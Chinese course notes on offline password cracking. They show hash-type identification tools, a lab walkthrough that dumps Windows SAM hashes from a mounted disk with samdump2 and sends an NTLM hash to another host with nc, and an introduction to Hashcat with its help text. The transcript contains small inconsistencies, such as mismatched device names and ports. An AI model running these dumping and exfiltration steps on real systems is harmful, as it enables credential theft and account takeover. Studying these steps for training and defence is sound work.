【安全牛學習筆記】離線密碼破解、離線密碼破解-Hashcat
|
離線密碼破解 優勢 - 離線不會觸發密碼鎖定機制 - 不會產生大量登入失敗日誌引起管理員注意 HASH識別工具 - hash-identifier - Hashid - 可能識別錯誤或無法識別 |
通過使用hashid或者Hash-Identifier這種工具來識別雜湊型別
工具下載地址:
git clone https://github.com/psypanda/hashid.git
git clone https://github.com/Miserlou/Hash-Identifier.git
[email protected]:~/Hash-Identifier# ls
Hash_ID.py README.md
[email protected]:~/Hash-Identifier# chmod u+x Hash_ID.py //賦予執行許可權
[email protected]:~/Hash-Identifier# python Hash_ID.py //開啟Hashid
-------------------------------------------------------------------------
HASH: 5f4dcc3b5aa765d61d8327deb882cf99 //md5加密
Possible Hashs:
[+] MD5
[+] Domain Cashed Credentials . MD4(MD5($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
-------------------------------------------------------------------------
HASH: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 //shal加密
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
-------------------------------------------------------------------------
[email protected]:~# hashid b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
[+] SHA-512
[+] Whirlpool
[+] Salsa10
[+] Salsa20
[+] SHA3-512
[+] SKein-512
[+] Skein-1024(512)
[email protected]:~/hashid# hashid 5f4dcc3b5aa765d61d8327deb882cf99
Analyzing '5f4dcc3b5aa765d61d8327deb882cf99'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
|
離線密碼破解 Windows HASH獲取工具 - 利用漏洞: Pwdump、fgdump、mimikatz、wce - 物理接觸: samdump2 - Kali ISO 啟動虛擬機器 - mount /dev/sdal /mnt - cd /mnt/Windows/System32/config - samdump2 SYSTEM SAM -o sam.hash - 利用nc傳輸HASH |
win7 ip地址: 192.168.1.121
C:\net user w7 1234
命令完成成功!
[email protected]:~# fdisk -l //檢視分割槽
Disk /dev/sha: 80 GiB, 85899345920 bytes, 16772160 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklablel type: dos
Disk identifier: 0x6852cbef
Device Boot Start End Sectors Size ID Type
/dev/sdal * 2048 206847 204800 100M 7 HPFS/NTFS/exFAX
/dev/sda2 206848 16770111 167563264 79.9G 7 HPFS/NTFS/exFAX
Disk /dev/loop0: 2.4GB, 2556620800 bytes, 4993400 sectors
UNits: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes /512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
[email protected]:~# mount /dev/sha2 /mnt/
[email protected]:~# mount /dev/sha2 /media/
[email protected]:~# cd /media/
[email protected]:/media# ls
Boot bootmgr BOOTSECT.BAK grldr $RECUELE.BIN System volume Information
[email protected]:/media# cd /mnt/
[email protected]:/mnt# ls
Documents and Settings
pagefiles.sys
PerfLogs
[email protected]:/mnt# cd /mnt/Windows/System32/config
[email protected]:/mnt/Windows/System32/config# ls
[email protected]:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash
[email protected]:/mnt/Windows/System32/config# cat sam.hash
*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
w7:1000:aad3b435b5140eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
[email protected]:~# nc -nvlp 3333
listeing on [any] 333...
connect to [192.168.1.117] from (UNKNOWN) [192.168.1.121] 56580
7ce21f17c0aee7fb9ceba532d0546ad6
↑
│利用nc監聽傳給它
│
[email protected]:/mnt/Windows/System32/config# nc 192.168.1.117 333
7ce21f17c0aee7fb9ceba532d0546ad6
|
離線密碼破解-----Hashcat 開源多執行緒密碼破解工具 支援80多種加密演算法破解 基於CPU的計算能力破解 六種模式 - 0 Straight: 字典破解 - 1 Combination: 將字典中密碼進行組合(1 2 > 11 22 12 21) - 2 Toggle case: 嘗試字典中所有密碼的大小寫字母組合 - 3 Brute force: 指定字符集(或全部字符集)所有組合 - 4 Permutation: 字典中密碼的全部字元置換組合(12 21) - 5 Table-lookup: 程式為字典中所有密碼自動生成掩碼 |
GPU破解神器Hashcat使用簡介
ccSec · 2013/09/30 20:13
0x00 背景
目前GPU的速度越來越快,使用GPU超強的運算速度進行暴力密碼破解也大大提高了成功率,曾經看到老外用26塊顯示卡組成的分散式破解神器讓我羨慕不已。要說目前最好的GPU破解HASH的軟體,非HashCat莫屬了。下面我就為大傢俱體介紹一下HashCat系列軟體。
0x01 所需硬體及系統平臺
HashCat系列軟體在硬體上支援使用CPU、NVIDIA GPU、ATI GPU來進行密碼破解。在作業系統上支援Windows、Linux平臺,並且需要安裝官方指定版本的顯示卡驅動程式,如果驅動程式版本不對,可能導致程式無法執行。
如果要搭建多GPU破解平臺的話,最好是使用Linux系統來執行HashCat系列軟體,因為在windows下,系統最多隻能識別4張顯示卡。並且,Linux下的VisualCL技術(關於如何搭建VisualCL環境,請參考官方文件http://hashcat.net/wiki/doku.php?id=vcl_cluster_howto),可以輕鬆的將幾臺機器連線起來,進行分散式破解作業。 在破解速度上,ATI GPU破解速度最快,使用單張HD7970破解MD5可達到9000M/s的速度,其次為NVIDIA顯示卡,同等級顯示卡GTX690破解速度大約為ATI顯示卡的三分之一,速度最慢的是使用CPU進行破解。
0x02 HashCat軟體簡介
HashCat主要分為三個版本:Hashcat、oclHashcat-plus、oclHashcat-lite。這三個版本的主要區別是:HashCat只支援CPU破解。oclHashcat-plus支援使用GPU破解多個HASH,並且支援的演算法高達77種。oclHashcat-lite只支援使用GPU對單個HASH進行破解,支援的HASH種類僅有32種,但是對演算法進行了優化,可以達到GPU破解的最高速度。如果只有單個密文進行破解的話,推薦使用oclHashCat-lite。
目前最新的軟體版本為HashCat v0.46、oclHashcat-plus v0.15、oclHashcat-lite v0.15。但是經過一段時間的測試,發現有時候版本越高,速度越慢。所以推薦在使用沒有問題的情況下,無需升級到最新版本。根據測試,oclHashcat-lite v0.10的運算速度比v0.15的運算速度快20%,所以單個密文破解還是推薦使用oclHashcat-lite v0.10。
[email protected]:~# hashcat -h
hashcat, advanced password recovery
Usage: hashcat [options] hashfile [mask|wordfiles|directories]
=======
Options
=======
* General:
-m, --hash-type=NUM Hash-type, see references below
-a, --attack-mode=NUM Attack-mode, see references below
-V, --version Print version
-h, --help Print help
--quiet Suppress output
* Benchmark:
-b, --benchmark Run benchmark
* Misc:
--hex-salt Assume salt is given in hex
--hex-charset Assume charset is given in hex
--runtime=NUM Abort session after NUM seconds of runtime
--status Enable automatic update of the status-screen
--status-timer=NUM Seconds between status-screen update
--status-automat Display the status view in a machine readable format
* Files:
-o, --outfile=FILE Define outfile for recovered hash
--outfile-format=NUM Define outfile-format for recovered hash, see references below
--outfile-autohex-disable Disable the use of $HEX[] in output plains
-p, --separator=CHAR Define separator char for hashlists/outfile
--show Show cracked passwords only (see --username)
--left Show uncracked passwords only (see --username)
--username Enable ignoring of usernames in hashfile (Recommended: also use --show)
--remove Enable remove of hash once it is cracked
--stdout Stdout mode
--potfile-disable Do not write potfile
--debug-mode=NUM Defines the debug mode (hybrid only by using rules), see references below
--debug-file=FILE Output file for debugging rules (see --debug-mode)
-e, --salt-file=FILE Salts-file for unsalted hashlists
* Resources:
-c, --segment-size=NUM Size in MB to cache from the wordfile
-n, --threads=NUM Number of threads
-s, --words-skip=NUM Skip number of words (for resume)
-l, --words-limit=NUM Limit number of words (for distributed)
* Rules:
-r, --rules-file=FILE Rules-file use: -r 1.rule
-g, --generate-rules=NUM Generate NUM random rules
--generate-rules-func-min=NUM Force NUM functions per random rule min
--generate-rules-func-max=NUM Force NUM functions per random rule max
--generate-rules-seed=NUM Force RNG seed to NUM
* Custom charsets:
-1, --custom-charset1=CS User-defined charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
-4, --custom-charset4=CS -2 mycharset.hcchr : sets charset ?2 to chars contained in file
* Toggle-Case attack-mode specific:
--toggle-min=NUM Number of alphas in dictionary minimum
--toggle-max=NUM Number of alphas in dictionary maximum
* Mask-attack attack-mode specific:
--increment Enable increment mode
--increment-min=NUM Start incrementing at NUM
--increment-max=NUM Stop incrementing at NUM
* Permutation attack-mode specific:
--perm-min=NUM Filter words shorter than NUM
--perm-max=NUM Filter words larger than NUM
* Table-Lookup attack-mode specific:
-t, --table-file=FILE Table file
--table-min=NUM Number of chars in dictionary minimum
--table-max=NUM Number of chars in dictionary maximum
* Prince attack-mode specific:
--pw-min=NUM Print candidate if length is greater than NUM
--pw-max=NUM Print candidate if length is smaller than NUM
--elem-cnt-min=NUM Minimum number of elements per chain
--elem-cnt-max=NUM Maximum number of elements per chain
--wl-dist-len Calculate output length distribution from wordlist
--wl-max=NUM Load only NUM words from input wordlist or use 0 to disable
--case-permute For each word in the wordlist that begins with a letter
generate a word with the opposite case of the first letter